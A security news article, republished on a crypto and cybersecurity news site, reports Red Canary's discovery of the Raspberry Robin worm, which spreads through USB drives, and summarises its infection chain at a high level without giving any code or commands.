Skip to content

Cyber Security And Bitcoin Blockchain News

The World

  • Ukrainian Soccer Club Shakhtar to Raise Humanitarian Funds Through NFT Sale – Bitcoin News bitcoin news
  • ETC Climbs to 1-Week High, as AXS Moves Away From 10-Month Low – Market Updates Bitcoin News bitcoin news
  • Bitcoin of America Launches New Website and Blog – Press release Bitcoin News bitcoin news
  • Ethereum Takes Hit, Why ETH Could Plunge Below $2,700 bitcoin news
  • Independent Russian News Site Meduza Raises Over $200,000 in Crypto – Bitcoin News bitcoin news
  • Institutional Investors Flood Over $300 Million In Bitcoin Fund, BTC To Reverse Above $30k? bitcoin news
  • Time For Autopsy? Bitcoin May Plunge Further After Dive Below $30k bitcoin news
  • Multi Protocol Decentralized Exchange Bashoswap Is Set to Launch It’s DEX on Cardano bitcoin news

Researchers Warn of ‘Raspberry Robin’ Malware Spreading via External Drives

Posted on May 6, 2022 By root


Raspberry Robin

Cybersecurity researchers have discovered a new Windows malware with worm-like capabilities and is propagated by means of removable USB devices.

Attributing the malware to a cluster named “Raspberry Robin,” Red Canary researchers noted that the worm “leverages Windows Installer to reach out to QNAP-associated domains and download a malicious DLL.”

The earliest signs of the activity are said to date back to September 2021, with infections observed in organizations with ties to technology and manufacturing sectors.

Attack chains pertaining to Raspberry Robin start with connecting an infected USB drive to a Windows machine. Present within the device is the worm payload, which appears as a .LNK shortcut file to a legitimate folder.

Raspberry Robin

The worm then takes care of spawning a new process using cmd.exe to read and execute a malicious file stored on the external drive.

This is followed by launching explorer.exe and msiexec.exe, the latter of which is used for external network communication to a rogue domain for command-and-control (C2) purposes and to download and install a DLL library file.

The malicious DLL is subsequently loaded and executed using a chain of legitimate Windows utilities such as fodhelper.exe, rundll32.exe to rundll32.exe, and odbcconf.exe, effectively bypassing User Account Control (UAC).

Also common across Raspberry Robin detections is the presence of outbound C2 contact involving the processes regsvr32.exe, rundll32.exe, and dllhost.exe to IP addresses associated with Tor nodes.

That said, the operators’ objectives remain unanswered at this stage. It’s also unclear how and where the external drives are infected, although it’s suspected that it’s carried out offline.

“We also don’t know why Raspberry Robin installs a malicious DLL,” the researchers said. “One hypothesis is that it may be an attempt to establish persistence on an infected system.”





TheHackersNews/

cyber security news

Post navigation

Previous Post: New Zealand VC Launches $5 Million Web3 and Crypto-Focused Fund – Finance Bitcoin News
Next Post: Bitcoin Collapses By Most In Nearly A Month

Related Posts

  • Iranian Hackers Leveraging BitLocker and DiskCryptor in Ransomware Attacks cyber security news
  • Ukrainian Hacker Jailed for 4-Years in U.S. for Selling Access to Hacked Servers cyber security news
  • 5 Benefits of Detection-as-Code cyber security news
  • GitHub Says Recent Attack Involving Stolen OAuth Tokens Was “Highly Targeted” cyber security news
  • Indian Govt Orders Organizations to Report Security Breaches Within 6 Hours to CERT-In cyber security news
  • E.U. Blames Russia for Cyberattack on KA-SAT Satellite Network Operated by Viasat cyber security news

Archives

  • May 2022

Categories

  • bitcoin news
  • cyber security news

Recent Posts

  • Hackers Trick Users with Fake Windows 11 Downloads to Distribute Vidar Malware
  • Cyprus Drafts Crypto Rules, May Introduce Them Before EU Regulations – Regulation Bitcoin News
  • MetaOasis AVAX Hackathon News Report – Press release Bitcoin News
  • Pakistan Can Generate $90 Million Annually if It Introduces a 15% Tax on Crypto Transactions – Emerging Markets Bitcoin News
  • QNAP Urges Users to Update NAS Devices to Prevent Deadbolt Ransomware Attacks

Recent Comments

No comments to show.
  • Aave Below Its Long Term Support; What To Expect Now? bitcoin news
  • Grayscale Launches European ETF While Urging SEC to Approve GBTC Conversion Into Spot Bitcoin ETF – Finance Bitcoin News bitcoin news
  • Everything We Learned From the LAPSUS$ Attacks cyber security news
  • Bitcoin’s Hashrate Taps an All-Time High, Next-Gen Machine Deployment Could Push it Much Higher – Mining Bitcoin News bitcoin news
  • Bitcoin Cash to Include Bigger Integers and Native Introspection in Upcoming Upgrade – Bitcoin News bitcoin news
  • World’s Largest Family-Owned Private Bank Now Offers Crypto Investments via SEBA Bank – Bitcoin News bitcoin news
  • Snoop & Gary Vee Got “Ownership” Of A Basketball Team With Ice Cube’s BIG3 NFTs bitcoin news
  • Blue Chip NFTs 101 – How Did Moonbirds Conquer The World In A Bearish Market? bitcoin news

Copyright © 2022 Cyber Security And Bitcoin Blockchain News.

Powered by PressBook News Dark theme